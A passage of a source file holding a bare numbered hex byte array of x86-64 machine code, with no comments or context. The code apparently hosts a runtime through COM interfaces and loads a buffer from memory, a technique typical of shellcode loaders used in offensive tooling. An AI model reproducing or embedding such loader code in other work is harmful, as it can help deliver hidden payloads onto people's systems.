654 0x00, 0x00, 0x48, 0x8d, 0x90, 0x18, 0x0d, 0x00, 0x00, 0x48, 0x8b, 0x85,
655 0x70, 0x03, 0x00, 0x00, 0x48, 0x05, 0x08, 0x0d, 0x00, 0x00, 0x48, 0x8b,
656 0x8d, 0x00, 0x03, 0x00, 0x00, 0x45, 0x89, 0xc1, 0x49, 0x89, 0xc8, 0x48,
657 0x89, 0xc1, 0xe8, 0x45, 0x53, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x70, 0x03,
658 0x00, 0x00, 0x48, 0x8b, 0x40, 0x28, 0x48, 0x8b, 0x95, 0x70, 0x03, 0x00,
659 0x00, 0x48, 0x8d, 0x8a, 0x00, 0x0c, 0x00, 0x00, 0x48, 0x89, 0xc2, 0xe8,
660 0x05, 0x50, 0x00, 0x00, 0x48, 0x89, 0x85, 0xf8, 0x02, 0x00, 0x00, 0x48,
661 0x8b, 0x85, 0x00, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x18, 0x05, 0x00,
662 0x00, 0x48, 0x39, 0x85, 0xf8, 0x02, 0x00, 0x00, 0x74, 0x07, 0xb8, 0x00,
663 0x00, 0x00, 0x00, 0xeb, 0x06, 0x8b, 0x85, 0x44, 0x03, 0x00, 0x00, 0x48,
664 0x81, 0xc4, 0xd0, 0x03, 0x00, 0x00, 0x5b, 0x5e, 0x5d, 0xc3, 0x55, 0x48,
665 0x81, 0xec, 0x70, 0x02, 0x00, 0x00, 0x48, 0x8d, 0xac, 0x24, 0x80, 0x00,
666 0x00, 0x00, 0x48, 0x89, 0x8d, 0x00, 0x02, 0x00, 0x00, 0x48, 0x89, 0x95,
667 0x08, 0x02, 0x00, 0x00, 0x4c, 0x89, 0x85, 0x10, 0x02, 0x00, 0x00, 0xc7,
668 0x85, 0xec, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x85, 0xe4,
669 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x00, 0x02,
670 0x00, 0x00, 0x48, 0x8b, 0x80, 0x78, 0x01, 0x00, 0x00, 0x48, 0x85, 0xc0,
671 0x0f, 0x84, 0x7c, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x00, 0x02, 0x00,
672 0x00, 0x48, 0x8b, 0x80, 0x78, 0x01, 0x00, 0x00, 0x4c, 0x8b, 0x85, 0x10,
673 0x02, 0x00, 0x00, 0x48, 0x8b, 0x95, 0x00, 0x02, 0x00, 0x00, 0x48, 0x81,
674 0xc2, 0x34, 0x08, 0x00, 0x00, 0x48, 0x8b, 0x8d, 0x00, 0x02, 0x00, 0x00,
675 0x48, 0x81, 0xc1, 0x24, 0x08, 0x00, 0x00, 0xff, 0xd0, 0x89, 0x85, 0xec,
676 0x01, 0x00, 0x00, 0x83, 0xbd, 0xec, 0x01, 0x00, 0x00, 0x00, 0x0f, 0x88,
677 0x28, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x08, 0x02, 0x00, 0x00, 0x48,
678 0x83, 0xc0, 0x0c, 0x48, 0x8d, 0x55, 0xb0, 0x49, 0x89, 0xd0, 0x48, 0x89,
679 0xc2, 0x48, 0x8b, 0x8d, 0x00, 0x02, 0x00, 0x00, 0xe8, 0xa4, 0xeb, 0xff,
680 0xff, 0x48, 0x8b, 0x85, 0x10, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48,
681 0x8b, 0x00, 0x4c, 0x8b, 0x50, 0x18, 0x48, 0x8b, 0x85, 0x10, 0x02, 0x00,
682 0x00, 0x4c, 0x8d, 0x40, 0x08, 0x48, 0x8b, 0x85, 0x00, 0x02, 0x00, 0x00,
683 0x48, 0x8d, 0x88, 0x44, 0x08, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x10, 0x02,
684 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x55, 0xb0, 0x4d, 0x89, 0xc1,
685 0x49, 0x89, 0xc8, 0x48, 0x89, 0xc1, 0x41, 0xff, 0xd2, 0x89, 0x85, 0xec,
686 0x01, 0x00, 0x00, 0x83, 0xbd, 0xec, 0x01, 0x00, 0x00, 0x00, 0x0f, 0x88,
687 0x9f, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x10, 0x02, 0x00, 0x00, 0x48,
688 0x8b, 0x40, 0x08, 0x48, 0x8b, 0x00, 0x4c, 0x8b, 0x40, 0x50, 0x48, 0x8b,
689 0x85, 0x10, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x08, 0x48, 0x8d, 0x95,
690 0xbc, 0x01, 0x00, 0x00, 0x48, 0x89, 0xc1, 0x41, 0xff, 0xd0, 0x89, 0x85,
691 0xec, 0x01, 0x00, 0x00, 0x83, 0xbd, 0xec, 0x01, 0x00, 0x00, 0x00, 0x0f,
692 0x88, 0x81, 0x00, 0x00, 0x00, 0x8b, 0x85, 0xbc, 0x01, 0x00, 0x00, 0x85,
693 0xc0, 0x74, 0x77, 0x48, 0x8b, 0x85, 0x10, 0x02, 0x00, 0x00, 0x48, 0x8b,
694 0x40, 0x08, 0x48, 0x8b, 0x00, 0x4c, 0x8b, 0x50, 0x48, 0x48, 0x8b, 0x85,
695 0x10, 0x02, 0x00, 0x00, 0x4c, 0x8d, 0x40, 0x10, 0x48, 0x8b, 0x85, 0x00,
696 0x02, 0x00, 0x00, 0x48, 0x8d, 0x88, 0x64, 0x08, 0x00, 0x00, 0x48, 0x8b,
697 0x85, 0x00, 0x02, 0x00, 0x00, 0x48, 0x8d, 0x90, 0x54, 0x08, 0x00, 0x00,
698 0x48, 0x8b, 0x85, 0x10, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x08, 0x4d,
699 0x89, 0xc1, 0x49, 0x89, 0xc8, 0x48, 0x89, 0xc1, 0x41, 0xff, 0xd2, 0x89,
700 0x85, 0xec, 0x01, 0x00, 0x00, 0xeb, 0x1f, 0x48, 0x8b, 0x85, 0x10, 0x02,
701 0x00, 0x00, 0x48, 0xc7, 0x40, 0x08, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x0e,
702 0x48, 0x8b, 0x85, 0x10, 0x02, 0x00, 0x00, 0x48, 0xc7, 0x00, 0x00, 0x00,
703 0x00, 0x00, 0x83, 0xbd, 0xec, 0x01, 0x00, 0x00, 0x00, 0x78, 0x13, 0x48,
704 0x8b, 0x85, 0x00, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x78, 0x01, 0x00,
705 0x00, 0x48, 0x85, 0xc0, 0x75, 0x52, 0x48, 0x8b, 0x85, 0x00, 0x02, 0x00,
706 0x00, 0x48, 0x8b, 0x80, 0x70, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x95, 0x10,
707 0x02, 0x00, 0x00, 0x48, 0x83, 0xc2, 0x10, 0x48, 0x8b, 0x8d, 0x00, 0x02,
708 0x00, 0x00, 0x4c, 0x8d, 0x81, 0x64, 0x08, 0x00, 0x00, 0x48, 0x8b, 0x8d,
709 0x00, 0x02, 0x00, 0x00, 0x48, 0x81, 0xc1, 0x54, 0x08, 0x00, 0x00, 0x48,
710 0x89, 0x54, 0x24, 0x20, 0x4d, 0x89, 0xc1, 0x49, 0x89, 0xc8, 0xba, 0x00,
711 0x00, 0x00, 0x00, 0xb9, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x89, 0x85,
712 0xec, 0x01, 0x00, 0x00, 0x83, 0xbd, 0xec, 0x01, 0x00, 0x00, 0x00, 0x79,
713 0x19, 0x48, 0x8b, 0x85, 0x10, 0x02, 0x00, 0x00, 0x48, 0xc7, 0x40, 0x10,
714 0x00, 0x00, 0x00, 0x00, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9, 0x20, 0x03,
715 0x00, 0x00, 0x48, 0x8b, 0x85, 0x10, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x40,
716 0x10, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x50, 0x50, 0x48, 0x8b, 0x85, 0x10,
717 0x02, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x89, 0xc1, 0xff, 0xd2,
718 0x89, 0x85, 0xec, 0x01, 0x00, 0x00, 0x83, 0xbd, 0xec, 0x01, 0x00, 0x00,
719 0x00, 0x0f, 0x88, 0xe5, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x08, 0x02,
720 0x00, 0x00, 0x0f, 0xb6, 0x80, 0x0c, 0x01, 0x00, 0x00, 0x84, 0xc0, 0x75,
721 0x39, 0x48, 0x8b, 0x85, 0x10, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x10,
722 0x48, 0x8b, 0x00, 0x4c, 0x8b, 0x40, 0x68, 0x48, 0x8b, 0x85, 0x10, 0x02,
723 0x00, 0x00, 0x48, 0x8d, 0x50, 0x18, 0x48, 0x8b, 0x85, 0x10, 0x02, 0x00,
724 0x00, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x89, 0xc1, 0x41, 0xff, 0xd0, 0x89,
725 0x85, 0xec, 0x01, 0x00, 0x00, 0xe9, 0x9f, 0x00, 0x00, 0x00, 0x48, 0x8b,
726 0x85, 0x08, 0x02, 0x00, 0x00, 0x48, 0x05, 0x0c, 0x01, 0x00, 0x00, 0x48,
727 0x8d, 0x55, 0xb0, 0x49, 0x89, 0xd0, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d,
728 0x00, 0x02, 0x00, 0x00, 0xe8, 0x5c, 0xe9, 0xff, 0xff, 0x48, 0x8b, 0x85,
729 0x00, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x90, 0x08, 0x01, 0x00, 0x00, 0x48,
730 0x8d, 0x45, 0xb0, 0x48, 0x89, 0xc1, 0xff, 0xd2, 0x48, 0x89, 0x85, 0xd8,
731 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x10, 0x02, 0x00, 0x00, 0x48, 0x8b,
732 0x40, 0x10, 0x48, 0x8b, 0x00, 0x4c, 0x8b, 0x50, 0x60, 0x48, 0x8b, 0x85,
733 0x10, 0x02, 0x00, 0x00, 0x48, 0x8d, 0x48, 0x18, 0x48, 0x8b, 0x85, 0x10,
734 0x02, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x8b, 0x95, 0xd8, 0x01,
735 0x00, 0x00, 0x49, 0x89, 0xc9, 0x41, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x48,
736 0x89, 0xc1, 0x41, 0xff, 0xd2, 0x89, 0x85, 0xec, 0x01, 0x00, 0x00, 0x48,
737 0x8b, 0x85, 0x00, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x90, 0x10, 0x01, 0x00,
738 0x00, 0x48, 0x8b, 0x85, 0xd8, 0x01, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xff,
739 0xd2, 0x83, 0xbd, 0xec, 0x01, 0x00, 0x00, 0x00, 0x0f, 0x88, 0xee, 0x01,
740 0x00, 0x00, 0x48, 0x8b, 0x85, 0x10, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x40,
741 0x18, 0x48, 0x8b, 0x00, 0x4c, 0x8b, 0x08, 0x48, 0x8b, 0x85, 0x10, 0x02,
742 0x00, 0x00, 0x48, 0x8d, 0x48, 0x20, 0x48, 0x8b, 0x85, 0x00, 0x02, 0x00,
743 0x00, 0x48, 0x8d, 0x90, 0x74, 0x08, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x10,
744 0x02, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x18, 0x49, 0x89, 0xc8, 0x48, 0x89,
745 0xc1, 0x41, 0xff, 0xd1, 0x89, 0x85, 0xec, 0x01, 0x00, 0x00, 0x83, 0xbd,
746 0xec, 0x01, 0x00, 0x00, 0x00, 0x0f, 0x88, 0x9d, 0x01, 0x00, 0x00, 0xc7,
747 0x85, 0xc4, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85,
748 0x08, 0x02, 0x00, 0x00, 0x8b, 0x80, 0x24, 0x05, 0x00, 0x00, 0x89, 0x85,
749 0xc0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x00, 0x02, 0x00, 0x00, 0x48,
750 0x8b, 0x80, 0xd8, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x95, 0xc0, 0x01, 0x00,
751 0x00, 0x49, 0x89, 0xd0, 0xba, 0x01, 0x00, 0x00, 0x00, 0xb9, 0x11, 0x00,
752 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89, 0x85, 0xd0, 0x01, 0x00, 0x00, 0x48,
753 0x83, 0xbd, 0xd0, 0x01, 0x00, 0x00, 0x00, 0x0f, 0x84, 0x47, 0x01, 0x00,
754 0x00, 0xc7, 0x85, 0xe8, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48,
755 0x8b, 0x85, 0xd0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x89,
756 0x85, 0xc8, 0x01, 0x00, 0x00, 0xeb, 0x2f, 0x8b, 0x95, 0xe8, 0x01, 0x00,
757 0x00, 0x48, 0x8b, 0x85, 0xc8, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x0c, 0x02,
758 0x48, 0x8b, 0x95, 0x08, 0x02, 0x00, 0x00, 0x8b, 0x85, 0xe8, 0x01, 0x00,
759 0x00, 0x0f, 0xb6, 0x84, 0x02, 0x28, 0x05, 0x00, 0x00, 0x88, 0x01, 0x83,
760 0x85, 0xe8, 0x01, 0x00, 0x00, 0x01, 0x48, 0x8b, 0x85, 0x08, 0x02, 0x00,
761 0x00, 0x8b, 0x80, 0x24, 0x05, 0x00, 0x00, 0x39, 0x85, 0xe8, 0x01, 0x00,
762 0x00, 0x72, 0xbc, 0x48, 0x8b, 0x85, 0x10, 0x02, 0x00, 0x00, 0x48, 0x8b,
763 0x40, 0x20, 0x48, 0x8b, 0x00, 0x4c, 0x8b, 0x88, 0x68, 0x01, 0x00, 0x00,
764 0x48, 0x8b, 0x85, 0x10, 0x02, 0x00, 0x00, 0x48, 0x8d, 0x48, 0x28, 0x48,
765 0x8b, 0x85, 0x10, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x20, 0x48, 0x8b,
766 0x95, 0xd0, 0x01, 0x00, 0x00, 0x49, 0x89, 0xc8, 0x48, 0x89, 0xc1, 0x41,
767 0xff, 0xd1, 0x89, 0x85, 0xec, 0x01, 0x00, 0x00, 0x83, 0xbd, 0xec, 0x01,
768 0x00, 0x00, 0x00, 0x0f, 0x94, 0xc0, 0x0f, 0xb6, 0xc0, 0x89, 0x85, 0xe4,
769 0x01, 0x00, 0x00, 0xc7, 0x85, 0xe8, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
770 0x00, 0x48, 0x8b, 0x85, 0xd0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x10,
771 0x48, 0x89, 0x85, 0xc8, 0x01, 0x00, 0x00, 0xeb, 0x44, 0x48, 0x8b, 0x95,
772 0x08, 0x02, 0x00, 0x00, 0x8b, 0x85, 0xe8, 0x01, 0x00, 0x00, 0xc6, 0x84,
773 0x02, 0x28, 0x05, 0x00, 0x00, 0x00, 0x8b, 0x95, 0xe8, 0x01, 0x00, 0x00,
774 0x48, 0x8b, 0x85, 0xc8, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x0c, 0x02, 0x48,
775 0x8b, 0x95, 0x08, 0x02, 0x00, 0x00, 0x8b, 0x85, 0xe8, 0x01, 0x00, 0x00,
776 0x0f, 0xb6, 0x84, 0x02, 0x28, 0x05, 0x00, 0x00, 0x88, 0x01, 0x83, 0x85,
777 0xe8, 0x01, 0x00, 0x00, 0x01, 0x48, 0x8b, 0x85, 0x08, 0x02, 0x00, 0x00,
778 0x8b, 0x80, 0x24, 0x05, 0x00, 0x00, 0x39, 0x85, 0xe8, 0x01, 0x00, 0x00,
779 0x72, 0xa7, 0x48, 0x8b, 0x85, 0x00, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x90,
780 0xf0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xd0, 0x01, 0x00, 0x00, 0x48,
781 0x89, 0xc1, 0xff, 0xd2, 0x8b, 0x85, 0xe4, 0x01, 0x00, 0x00, 0x48, 0x81,
782 0xc4, 0x70, 0x02, 0x00, 0x00, 0x5d, 0xc3, 0x55, 0x53, 0x48, 0x81, 0xec,
783 0x68, 0x03, 0x00, 0x00, 0x48, 0x8d, 0xac, 0x24, 0x80, 0x00, 0x00, 0x00,
784 0x48, 0x89, 0x8d, 0x00, 0x03, 0x00, 0x00, 0x48, 0x89, 0x95, 0x08, 0x03,
785 0x00, 0x00, 0x4c, 0x89, 0x85, 0x10, 0x03, 0x00, 0x00, 0x48, 0xc7, 0x85,
786 0xd8, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x85, 0xa8,
787 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x85, 0x30, 0x02,
788 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x85, 0x38, 0x02, 0x00,
789 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x85, 0x40, 0x02, 0x00, 0x00,
790 0x00, 0x00, 0x00, 0x00, 0x66, 0xc7, 0x85, 0x0a, 0x02, 0x00, 0x00, 0x00,
791 0x00, 0x48, 0x8b, 0x85, 0x08, 0x03, 0x00, 0x00, 0x8b, 0x00, 0x83, 0xf8,
792 0x02, 0x0f, 0x85, 0xc1, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x10, 0x03,
793 0x00, 0x00, 0x48, 0x8b, 0x40, 0x28, 0x48, 0x8b, 0x00, 0x4c, 0x8b, 0x80,
794 0x80, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x10, 0x03, 0x00, 0x00, 0x48,
795 0x8d, 0x50, 0x38, 0x48, 0x8b, 0x85, 0x10, 0x03, 0x00, 0x00, 0x48, 0x8b,
796 0x40, 0x28, 0x48, 0x89, 0xc1, 0x41, 0xff, 0xd0, 0x89, 0x85, 0xd4, 0x02,
797 0x00, 0x00, 0x83, 0xbd, 0xd4, 0x02, 0x00, 0x00, 0x00, 0x0f, 0x88, 0x69,
798 0x03, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x10, 0x03, 0x00, 0x00, 0x48, 0x8b,
799 0x40, 0x38, 0x48, 0x8b, 0x00, 0x4c, 0x8b, 0x80, 0x90, 0x00, 0x00, 0x00,
800 0x48, 0x8b, 0x85, 0x10, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x38, 0x48,
801 0x8d, 0x95, 0xa8, 0x02, 0x00, 0x00, 0x48, 0x89, 0xc1, 0x41, 0xff, 0xd0,
802 0x89, 0x85, 0xd4, 0x02, 0x00, 0x00, 0x83, 0xbd, 0xd4, 0x02, 0x00, 0x00,
803 0x00, 0x0f, 0x88, 0x80, 0x06, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x00, 0x03,
804 0x00, 0x00, 0x4c, 0x8b, 0x88, 0xf8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85,
805 0xa8, 0x02, 0x00, 0x00, 0x48, 0x8d, 0x95, 0x00, 0x02, 0x00, 0x00, 0x49,
806 0x89, 0xd0, 0xba, 0x01, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0x41, 0xff,
807 0xd1, 0x89, 0x85, 0xd4, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x00, 0x03,
808 0x00, 0x00, 0x4c, 0x8b, 0x88, 0x00, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85,
809 0xa8, 0x02, 0x00, 0x00, 0x48, 0x8d, 0x95, 0x04, 0x02, 0x00, 0x00, 0x49,
810 0x89, 0xd0, 0xba, 0x01, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0x41, 0xff,
811 0xd1, 0x89, 0x85, 0xd4, 0x02, 0x00, 0x00, 0x8b, 0x85, 0x04, 0x02, 0x00,
812 0x00, 0x8b, 0x95, 0x00, 0x02, 0x00, 0x00, 0x29, 0xd0, 0x83, 0xc0, 0x01,
813 0x89, 0x85, 0xb4, 0x02, 0x00, 0x00, 0x83, 0xbd, 0xb4, 0x02, 0x00, 0x00,
814 0x00, 0x0f, 0x84, 0xe5, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x00, 0x03,
815 0x00, 0x00, 0x48, 0x8b, 0x80, 0xe0, 0x00, 0x00, 0x00, 0x41, 0xb8, 0x01,
816 0x00, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0xb9, 0x0c, 0x00, 0x00,
817 0x00, 0xff, 0xd0, 0x48, 0x89, 0x85, 0xd8, 0x02, 0x00, 0x00, 0x48, 0x8b,
818 0x85, 0x08, 0x03, 0x00, 0x00, 0x0f, 0xb6, 0x80, 0x0c, 0x04, 0x00, 0x00,
819 0x84, 0xc0, 0x0f, 0x84, 0xf7, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x08,
820 0x03, 0x00, 0x00, 0x48, 0x05, 0x0c, 0x04, 0x00, 0x00, 0x48, 0x8d, 0x55,
821 0xf0, 0x49, 0x89, 0xd0, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d, 0x00, 0x03,
822 0x00, 0x00, 0xe8, 0xf6, 0xe4, 0xff, 0xff, 0x48, 0x8b, 0x85, 0x00, 0x03,
823 0x00, 0x00, 0x4c, 0x8b, 0x80, 0xd0, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x55,
824 0xec, 0x48, 0x8d, 0x45, 0xf0, 0x48, 0x89, 0xc1, 0x41, 0xff, 0xd0, 0x48,
825 0x89, 0x85, 0xb8, 0x02, 0x00, 0x00, 0x66, 0xc7, 0x85, 0x50, 0x02, 0x00,
826 0x00, 0x08, 0x20, 0x48, 0x8b, 0x85, 0x00, 0x03, 0x00, 0x00, 0x48, 0x8b,
827 0x80, 0xe0, 0x00, 0x00, 0x00, 0x8b, 0x55, 0xec, 0x41, 0x89, 0xd0, 0xba,
828 0x00, 0x00, 0x00, 0x00, 0xb9, 0x08, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48,
829 0x89, 0x85, 0x58, 0x02, 0x00, 0x00, 0xc7, 0x85, 0x0c, 0x02, 0x00, 0x00,
830 0x00, 0x00, 0x00, 0x00, 0xeb, 0x66, 0x48, 0x8b, 0x85, 0x00, 0x03, 0x00,
831 0x00, 0x48, 0x8b, 0x98, 0xe8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x00,
832 0x03, 0x00, 0x00, 0x48, 0x8b, 0x90, 0x08, 0x01, 0x00, 0x00, 0x8b, 0x85,
833 0x0c, 0x02, 0x00, 0x00, 0x89, 0xc0, 0x48, 0x8d, 0x0c, 0xc5, 0x00, 0x00,
834 0x00, 0x00, 0x48, 0x8b, 0x85, 0xb8, 0x02, 0x00, 0x00, 0x48, 0x01, 0xc8,
835 0x48, 0x8b, 0x00, 0x48, 0x89, 0xc1, 0xff, 0xd2, 0x48, 0x89, 0xc1, 0x48,
836 0x8b, 0x85, 0x58, 0x02, 0x00, 0x00, 0x48, 0x8d, 0x95, 0x0c, 0x02, 0x00,
837 0x00, 0x49, 0x89, 0xc8, 0x48, 0x89, 0xc1, 0xff, 0xd3, 0x8b, 0x85, 0x0c,
838 0x02, 0x00, 0x00, 0x83, 0xc0, 0x01, 0x89, 0x85, 0x0c, 0x02, 0x00, 0x00,
839 0x8b, 0x85, 0x0c, 0x02, 0x00, 0x00, 0x8b, 0x55, 0xec, 0x39, 0xd0, 0x72,
840 0x8d, 0xeb, 0x7b, 0x66, 0xc7, 0x85, 0x50, 0x02, 0x00, 0x00, 0x08, 0x20,
841 0x48, 0x8b, 0x85, 0x00, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x80, 0xe0, 0x00,
842 0x00, 0x00, 0x41, 0xb8, 0x01, 0x00, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00,
843 0x00, 0xb9, 0x08, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89, 0x85, 0x58,
844 0x02, 0x00, 0x00, 0xc7, 0x85, 0x0c, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00,
845 0x00, 0x48, 0x8b, 0x85, 0x00, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x98, 0xe8,
846 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x00, 0x03, 0x00, 0x00, 0x48, 0x8b,
847 0x90, 0x08, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x85, 0x0a, 0x02, 0x00, 0x00,
848 0x48, 0x89, 0xc1, 0xff, 0xd2, 0x48, 0x89, 0xc1, 0x48, 0x8b, 0x85, 0x58,
849 0x02, 0x00, 0x00, 0x48, 0x8d, 0x95, 0x0c, 0x02, 0x00, 0x00, 0x49, 0x89,
850 0xc8, 0x48, 0x89, 0xc1, 0xff, 0xd3, 0xc7, 0x85, 0x0c, 0x02, 0x00, 0x00,
851 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x00, 0x03, 0x00, 0x00, 0x4c,
852 0x8b, 0x88, 0xe8, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x8d, 0x50, 0x02, 0x00,
853 0x00, 0x48, 0x8d, 0x95, 0x0c, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xd8,
854 0x02, 0x00, 0x00, 0x49, 0x89, 0xc8, 0x48, 0x89, 0xc1, 0x41, 0xff, 0xd1,
855 0x66, 0xc7, 0x85, 0x30, 0x02, 0x00, 0x00, 0x01, 0x00, 0x48, 0xc7, 0x85,
856 0x38, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x10,
857 0x03, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x38, 0x48, 0x8b, 0x00, 0x4c, 0x8b,
858 0x90, 0x28, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x10, 0x03, 0x00, 0x00,
859 0x48, 0x8b, 0x48, 0x38, 0x48, 0x8b, 0x85, 0x30, 0x02, 0x00, 0x00, 0x48,
860 0x8b, 0x95, 0x38, 0x02, 0x00, 0x00, 0x48, 0x89, 0x45, 0xc0, 0x48, 0x89,
861 0x55, 0xc8, 0x48, 0x8b, 0x85, 0x40, 0x02, 0x00, 0x00, 0x48, 0x89, 0x45,
862 0xd0, 0x4c, 0x8d, 0x85, 0x10, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x95, 0xd8,
863 0x02, 0x00, 0x00, 0x48, 0x8d, 0x45, 0xc0, 0x4d, 0x89, 0xc1, 0x49, 0x89,
864 0xd0, 0x48, 0x89, 0xc2, 0x41, 0xff, 0xd2, 0x89, 0x85, 0xd4, 0x02, 0x00,
865 0x00, 0x48, 0x83, 0xbd, 0xd8, 0x02, 0x00, 0x00, 0x00, 0x0f, 0x84, 0x90,
866 0x03, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x00, 0x03, 0x00, 0x00, 0x48, 0x8b,
867 0x90, 0xf0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x58, 0x02, 0x00, 0x00,
868 0x48, 0x89, 0xc1, 0xff, 0xd2, 0x48, 0x8b, 0x85, 0x00, 0x03, 0x00, 0x00,
869 0x48, 0x8b, 0x90, 0xf0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xd8, 0x02,
870 0x00, 0x00, 0x48, 0x89, 0xc1, 0xff, 0xd2, 0xe9, 0x57, 0x03, 0x00, 0x00,
871 0x48, 0x8b, 0x85, 0x10, 0x03, 0x00, 0x00, 0x48, 0xc7, 0x40, 0x38, 0x00,
872 0x00, 0x00, 0x00, 0xe9, 0x43, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x08,
873 0x03, 0x00, 0x00, 0x48, 0x05, 0x0c, 0x02, 0x00, 0x00, 0x48, 0x8d, 0x55,
874 0xf0, 0x49, 0x89, 0xd0, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d, 0x00, 0x03,
875 0x00, 0x00, 0xe8, 0x7a, 0xe2, 0xff, 0xff, 0x48, 0x8b, 0x85, 0x00, 0x03,
876 0x00, 0x00, 0x48, 0x8b, 0x90, 0x08, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x45,
877 0xf0, 0x48, 0x89, 0xc1, 0xff, 0xd2, 0x48, 0x89, 0x85, 0xc8, 0x02, 0x00,
878 0x00, 0x48, 0x83, 0xbd, 0xc8, 0x02, 0x00, 0x00, 0x00, 0x75, 0x0a, 0xb8,
879 0x00, 0x00, 0x00, 0x00, 0xe9, 0xf3, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85,
880 0x08, 0x03, 0x00, 0x00, 0x48, 0x05, 0x0c, 0x03, 0x00, 0x00, 0x48, 0x8d,
881 0x55, 0xf0, 0x49, 0x89, 0xd0, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d, 0x00,
882 0x03, 0x00, 0x00, 0xe8, 0x25, 0xe2, 0xff, 0xff, 0x48, 0x8b, 0x85, 0x00,
883 0x03, 0x00, 0x00, 0x48, 0x8b, 0x90, 0x08, 0x01, 0x00, 0x00, 0x48, 0x8d,
884 0x45, 0xf0, 0x48, 0x89, 0xc1, 0xff, 0xd2, 0x48, 0x89, 0x85, 0xc0, 0x02,
